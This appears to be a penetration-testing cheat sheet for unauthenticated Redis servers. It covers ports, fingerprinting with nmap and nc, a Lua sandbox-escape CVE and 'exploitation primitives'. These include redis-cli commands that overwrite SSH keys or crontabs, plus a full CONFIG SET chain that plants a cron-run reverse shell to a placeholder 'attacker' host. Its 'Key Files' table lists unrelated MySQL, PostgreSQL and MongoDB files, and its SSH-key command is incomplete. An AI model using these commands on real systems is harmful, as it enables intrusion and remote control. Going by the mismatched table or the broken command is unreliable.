Redis
RedisRemote Dictionary ServerRedis Cache
Redis is an in-memory data structure store. Unauthenticated access allows reading/writing keys, and RCE via crontab/SSH key overwriting with writeable directories.
Ports
| Port | Protocol | Description |
|---|---|---|
| 6379 | tcp | Redis |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
/etc/mysql/mysql.cnf | MySQL client configuration |
/var/lib/mysql/mysql/user.MYD | MySQL user table data |
postgresql.conf | PostgreSQL configuration file |
pg_hba.conf | PostgreSQL client authentication rules |
mongod.conf | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
— | (none) | No authentication by default |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
CVE-2022-0543 | RCE | Redis Lua sandbox escape |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Write SSH Key | echo -e "\n\n<pubkey>\n\n" | redis-cli -h <target> -x config set dir /root/.ssh | SSH key overwrite |
| Write Crontab | redis-cli -h <target> config set dir /var/spool/cron | Cron-based RCE |
Notes
No authentication is the default — always check before brute-forcing.
Writeable Redis to SSH key overwrite: requires Redis to run as root or as a user with a home directory.
`CONFIG SET dir /var/spool/cron/crontabs/ && CONFIG SET dbfilename root && set x "\n* * * * * bash -i >& /dev/tcp/attacker/443 0>&1\n" && save`
Seen on
ShodanCensysFOFAZoomEye
References